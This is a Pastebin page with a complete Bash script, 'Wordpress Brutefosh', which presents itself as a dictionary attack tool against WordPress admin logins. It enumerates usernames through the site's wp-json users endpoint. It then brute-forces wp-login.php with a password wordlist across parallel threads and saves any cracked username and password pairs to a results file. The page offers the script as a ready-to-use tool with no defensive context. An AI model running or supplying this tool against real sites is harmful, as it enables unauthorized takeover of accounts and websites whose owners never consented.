G2A Many GEOs
SHARE
TWEET

[BASH] Wordpress Brutefosh 1.0

zerobyte-id Mar 28th, 2019 (edited) 964 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 1.2
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-28
  8.  
  9. #----------- CONFIGURATION -----------
  10. curl_timeout=20
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
  18. RED='\e[31m'
  19. GRN='\e[32m'
  20. YEL='\e[33m'
  21. CLR='\e[0m'
  22.  
  23. function _GetUserWPJSON() {
  24.     Target="${1}";
  25.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  26.     echo ""
  27.     if [[ -z ${UsernameLists} ]];
  28.     then
  29.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  30.     else
  31.         echo -ne > wpusername.tmp
  32.         for Username in ${UsernameLists};
  33.         do
  34.             echo "INFO: Found username \"${Username}\"..."
  35.             echo "${Username}" >> wpusername.tmp
  36.         done
  37.     fi
  38. }
  39.  
  40. function _TestLogin() {
  41.     Target="${1}"
  42.     Username="${2}"
  43.     Password="${3}"
  44.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
  45.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  46.     then
  47.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  48.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  49.     then
  50.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
  51.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  52.     else
  53.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  54.     fi
  55. }
  56.  
  57. echo ' _    _               _                         '
  58. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  59. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  60. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  61. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  62. echo '                       |_|.::Brutefo(sh) 2019::.'
  63. echo ''
  64.  
  65. echo -ne "[?] Input website target : "
  66. read Target
  67.  
  68. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  69. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  70. then
  71.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
  72.     exit
  73. fi
  74.  
  75. echo -ne "[?] Input password lists in (file) : "
  76. read PasswordLists
  77.  
  78. if [[ ! -f ${PasswordLists} ]]
  79. then
  80.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
  81.     exit
  82. fi
  83.  
  84. _GetUserWPJSON ${Target}
  85.  
  86. if [[ -f wpusername.tmp ]]
  87. then
  88.     for User in $(cat wpusername.tmp)
  89.     do
  90.         (
  91.             for Pass in $(cat ${PasswordLists})
  92.             do
  93.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  94.                 _TestLogin ${Target} ${User} ${Pass} &
  95.             done
  96.             wait
  97.         )
  98.     done
  99. else
  100.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  101.     echo -ne "[?] Input username manually : "
  102.     read User
  103.  
  104.     if [[ -z ${PasswordLists} ]]
  105.     then
  106.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  107.         exit
  108.     fi
  109.     echo ''
  110.     (
  111.         for Pass in $(cat ${PasswordLists})
  112.         do
  113.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  114.             _TestLogin ${Target} ${User} ${Pass} &
  115.         done
  116.         wait
  117.     )
  118. fi
  119. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top